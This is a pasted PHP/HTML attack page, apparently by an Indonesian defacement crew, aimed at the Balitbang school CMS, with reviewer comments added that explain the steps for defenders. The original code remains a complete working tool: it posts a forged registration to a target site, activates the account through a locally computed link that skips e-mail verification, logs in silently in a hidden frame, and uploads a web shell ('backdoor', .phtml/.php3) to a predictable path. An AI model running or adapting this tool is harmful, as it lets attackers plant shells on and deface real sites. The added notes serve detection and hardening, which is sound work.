ebulobo

Balitbang/users

Mar 27th, 2017
  1. <html>
  2. <!---
  3. // Script CSRF by EBULOBO
  4. // --------------------------
  5. // Shell Backdoor harus *.phtml
  6. // Upload Csrf ini dengan format itw.php
  7. // --------------------------
  8. // Happy Deface :v
  9. // --------------------------
  10. // All Team From Indonesia To World :
  11. EBULOBO | 0N3R1D3R | ./N30F0RC3 | CYB3RH00D |
  12. XS4BL9 | Mr.P0ME404
  13. // --------------------------
  14. -->
  15. <head>
  16. <title>CSRF BALITBANG BY EBULOBO</title>
  17. </head>
  18. <style type="text/css">
  19. input[type=text],input[type=code],input[type=password]{
  20. border:1px solid #c0c0c0;
  21. height:24px;
  22. padding:5px;
  23. }
  24. </style>
  25. <body>
  26. <?php
  // hex(): reversible string obfuscation, not encryption (there is no key).
  // Output layout: dechex(strlen($str) + $code), the literal "g", then
  // dechex(byte + $code) for every byte of the reversed input.
  // Only runs when 0 <= $code < 100; otherwise $t is never assigned and the
  // function returns an unset variable.
  // This page always calls it with the constant "82", so the output is fully
  // determined by the input string; the matching decoder is unhex() in this file.
  // NOTE(review): dechex() is not zero-padded, so byte + $code values of 256 or
  // more give three hex digits and no longer fit the two-digits-per-byte
  // layout that unhex() reads back.
  27. function hex($str='',$code='') {
  28. if(($code>=0)and($code<100)) {
  // Length header, shifted by $code, terminated by "g".
  29. $t .=dechex(strlen($str)+$code)."g";
  30. $str=strrev($str);
  31. for($i=0;$i<=strlen($str)-1;$i++) {
  // Each byte of the reversed string is shifted by $code and hex-printed.
  32. $t .=dechex(ord(substr($str,$i,1))+$code);
  33. }
  34. }
  35. return $t;
  36. }
  // unhex(): inverse of hex() for the same $code.
  // Splits the input on "g", subtracts $code from the hex length header, and
  // decodes only when that length equals half the length of the payload
  // (two hex digits per byte). Each pair is hex-decoded, shifted back by
  // $code, and the result is reversed to restore the original order.
  // If the length check fails, $t is never assigned and an unset variable is
  // returned. Nothing in the visible page calls this function.
  37. function unhex($str='',$code='') {
  38. $all=explode("g",$str);
  39. $head=hexdec($all[0])-$code;
  40. $content=$all[1];
  // Consistency check: declared length must match the payload length.
  41. if($head==(strlen($content)/2)) {
  42. for($i=0;$i<=$head-1;$i++) {
  43. $t .=chr(hexdec(substr($content,$i*2,2))-$code);
  44. }
  45. $t =strrev($t);
  46. }
  47. return $t;
  48. }
  // Request setup. The base URL, username and password all come from the query
  // string and are used as-is.
  // Defender note: the four paths appended to the base URL below are the
  // endpoints this page talks to. On a site running the affected application,
  // they are the request paths to review in web access logs:
  //   /users/membersave.php      (member registration)
  //   /procs/212sim-materi.php   (file upload)
  //   /procs/captcha/captcha.php (captcha image)
  //   /users/ajax_login.php      (login)
  49. $target = $_GET['target'];
  50. $ur_target = $target."/users/membersave.php";
  51. $ur_upload = $target."/procs/212sim-materi.php";
  52. $captcha = $target."/procs/captcha/captcha.php";
  53. $ur_login = $target."/users/ajax_login.php";
  // The chosen credentials travel in the URL (n = username, p = password),
  // so they also end up in this page's own server logs and browser history.
  54. $userx = $_GET['n'];
  55. $passx = $_GET['p'];
  // When the first form is posted, redirect to the same script (itw.php) with
  // load=daftar and the posted values concatenated into the query string.
  56. if(isset($_POST['next'])){
  57. $tar = $_POST['tar'];
  58. $n = $_POST['n'];
  59. $p = $_POST['p'];
  60. header("Location: itw.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
  61. }
  62. echo "CSRF Regstration Form + Shell Uploader By Ebulobo<hr>";
  63. ?>
  <!--
    Parameter form. It posts back to this same script (empty action) with three
    text fields: tar (base URL), n (username) and p (password, shown in clear
    because the field is type=text). Nothing is sent to the remote site from
    this form; the PHP above turns the post into a redirect with load=daftar.
  -->
  64. <form method="post" action="" enctype="multipart/form-data">
  65. <table id=tablebaru cellspacing='1' cellpadding='3'>
  66. <tr>
  67. <td>Target</td>
  68. <td>:</td>
  69. <td><input type="text" name="tar" size="66" placeholder='http://'/></td>
  70. </tr>
  71. <tr>
  72. <td>Username</td>
  73. <td>:</td>
  74. <td><input type="text" name="n" size="66"/></td>
  75. </tr>
  76. <tr>
  77. <td>Password</td>
  78. <td>:</td>
  79. <td><input type="text" name="p" size="66"/></td>
  80. </tr>
  81. <tr>
  82. <td></td>
  83. <td></td>
  84. <td><input type="submit" name="next" value="GO &raquo;"/></td>
  85. </tr>
  86. </table>
  87. </form>
  88. <hr>
  89. <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
  90. $asli = hex($userx,"82");
  91. $pass = hex($passx,"82");
  92. echo "Username : <b>$userx</b><br>";
  93. echo "Password : <b>$passx</b><hr>";
  94. ?>
  <!--
    Registration form, submitted from this page to the remote
    /users/membersave.php; the response is shown in the frame named "iframe".
    Every profile field is pre-filled and hidden. Only the captcha answer
    (field "code") is typed by hand, against an image loaded directly from the
    remote /procs/captcha/captcha.php.

    Defender notes:
    - The form carries no anti-CSRF token, and the page title calls this a CSRF
      form, so the registration endpoint presumably accepts posts that
      originate from another site. Checking Origin/Referer or requiring a
      per-session token on membersave.php would reject them. TODO confirm
      against the application source.
    - The fixed values below (name "ebulobo", email "bla-bla-bla@gmail.com",
      alamat "jauh", sekolah and tentang "terserah", birth date 01/01/1990) are
      usable as search terms when auditing the member table for accounts
      created this way. They are trivially changed, so absence proves nothing.
    - "userid" is a constant produced by hex("simtambah,","82"). What the
      server does with it is not visible on this page.
  -->
  95. <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
  96. <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
  97. <input type=hidden name='name' value='ebulobo'/>
  98. <input type=hidden name='username' value='<?php echo $userx;?>'/>
  99. <input type=hidden name='password' value='<?php echo $passx;?>'/>
  100. <input type=hidden name='email' value='bla-bla-bla@gmail.com'/>
  101. <input type=hidden name='kelamin' value='m'/>
  102. <input type=hidden name='jenis' value='Tamu'>
  103. <input type=hidden name='kelas' value=''/>
  104. <input type=hidden name='hari' value='01'/>
  105. <input type=hidden name='bulan' value='01'/>
  106. <input type=hidden name='tahun' value='1990'/>
  107. <input type=hidden name='nis' value=''/>
  108. <input type=hidden name='pertanyaan' value='1'/>
  109. <input type=hidden name='jawaban' value='1'/>
  110. <input type=hidden name='kerja' value='Guru'/>
  111. <input type=hidden name='alamat' value='jauh'/>
  112. <input type=hidden name='sekolah' value='terserah'/>
  113. <input type=hidden name='telp' value='0'/>
  114. <input type=hidden name='blog' value=''/>
  115. <input type=hidden name='tentang' value='terserah'/>
  116. <input type=hidden name='country' value='INDONESIA'/>
  117. <input type=hidden name='stprofil' value='open'/>
  118. <input type=hidden name='stblog' value='on'/>
  119. <table>
  120. <tr>
  121. <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
  122. <td rowspan="2" valign="top"><i>&raquo; Capture Target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
  123. </tr>
  124. <tr>
  125. <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
  126. <td valign="top"><input type=submit name='submit' value='SIKAT &raquo;'/></td>
  127. </tr>
  128. </table>
  129. </form>
  130. <?php
  // Prints the account-activation link, first inside an HTML comment and then
  // as a button that loads it into the frame named "verif".
  // Defender note: the link is /valid/index.php?id=...&p=... where both values
  // are hex() of the username and password with the constant 82, computed
  // locally a few lines above. As far as this page shows, the activation URL
  // therefore contains nothing that only the server (or the mailbox owner)
  // knows, so e-mail verification does not gate these accounts. An activation
  // token should be random and generated server-side.
  // The second button only navigates this script to load=upload, again with
  // the credentials in the query string.
  131. echo "<!--
  132. ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
  133. -->
  134. ";
  135. echo "Langkah Selanjutnya:<br>1. Setelah Registrasi Berhasil, <input type='button' value='KLIK DISINI' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> Untuk Aktivasi/Verifikasi!.
  136. <br><i>&raquo; Capture Target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah Terakhir, Upload Backdoornya <input type='button' onclick=\"window.location.href='itw.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='DISINI'/><hr>";
  137. } else if(isset($_GET['load']) && $_GET['load'] == "upload"){
  138. ?>
  139. <script type="text/javascript">
  // On page load, submit the form named login_form without user interaction.
  // That form targets the small frame named "autologin", so the login request
  // to the remote site happens in the background of this page.
  140. window.onload = function(){
  141. document.forms['login_form'].submit()
  142.  
  143. }
  // Sets the src of the element with id "verif". No element in this branch of
  // the page has that id (the "verif" frame in the other branch is declared
  // with name=, not id=) and nothing visible calls setURL, so this looks unused.
  144. function setURL(url){
  145. document.getElementById('verif').src = url;
  146. }
  147. </script>
  <!--
    Login form posted from this page to the remote /users/ajax_login.php with
    the fields user_name and password. The response is rendered in a 30x30
    borderless frame. The script above submits it automatically on load; the
    visible button is a manual fallback.

    Defender note: a login endpoint that accepts a form post from another
    origin and sets a session cookie in a framed response lets a foreign page
    establish an authenticated session in the visitor's browser. SameSite
    session cookies and an Origin check on the login handler close that path.
    In access logs this shows up as a POST to ajax_login.php whose Referer is
    not the site itself.
  -->
  148. <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
  149. <input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
  150. <input type='hidden' name='password' value="<?php echo $passx;?>"/>
  151. Jika Tidak Bisa Login Dihalaman Member, <input type='submit' name='submit' value='KLIK DISINI'/>
  152. </form>
  153. <div style='margin-top:-20px;'>
  154. <iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
  155. </div>
  <!--
    Upload form: a multipart post from this page to the remote
    /procs/212sim-materi.php with the fields pesan, file, st, nis and idtugas.
    The response is rendered in the frame named "golink". The link below the
    frame points at /files/tugas/tgs-ebulobo.php3, which is where the page
    expects the uploaded file to be reachable.

    Defender notes:
    - The expected file name contains the value of the "st" field ("ebulobo"),
      so the stored name is presumably derived from client-supplied input.
      TODO confirm against the application source.
    - The header comment of this paste says the uploaded file must be *.phtml,
      while the result link ends in .php3. Both are extensions that many PHP
      setups execute. The upload handler should accept only an allowlist of
      document types and generate the stored name itself.
    - Script execution should be disabled for the upload directory, or uploads
      kept outside the web root, so that a file that slips through is served
      as data rather than run.
    - When auditing a site, any .php, .php3 or .phtml file under /files/tugas/
      and any POST to 212sim-materi.php from an unexpected Referer deserve a
      closer look.
  -->
  156. <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
  157. <input type='hidden' name='pesan' value='abcabcabc'/></td>
  158. <table cellspacing='1' cellpadding='3'>
  159. <tr>
  160. <td valign='top'>File</td>
  161. <td valign='top'>:</td>
  162. <td valign='top'><input type='file' name='file'></td>
  163. <td valign='top' align='right'><input type='submit' value=' SIMPAN '/></td>
  164. </tr>
  165. <tr>
  166. <td valign='top' colspan="4"><i>&raquo; Capture Target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
  167. </tr>
  168. <tr>
  169. <td valign='top' colspan="4">
  170. Hasil Upload (.phtml): <a href="<?php echo $target."/files/tugas/tgs-ebulobo.php3";?>" target="_blank"><?php echo $target."/files/tugas/tgs-ebulobo.php3";?></a></td>
  171. </tr>
  172. </table>
  173. <input type=hidden name='st' value='ebulobo'>
  174. <input type=hidden name='nis' value=''>
  175. <input type=hidden name='idtugas' value=''>
  176. </form>
  177. <hr>
  178. <br>
  179. Thanks To All Team:
  180. <br>
  181. EBULOBO | 0N3R1D3R | ./N30F0RC3 | CYB3RH00D | XS4BL9 | Mr.P0ME40
  182. <?php } ?>
  183. </body>
  184. </html>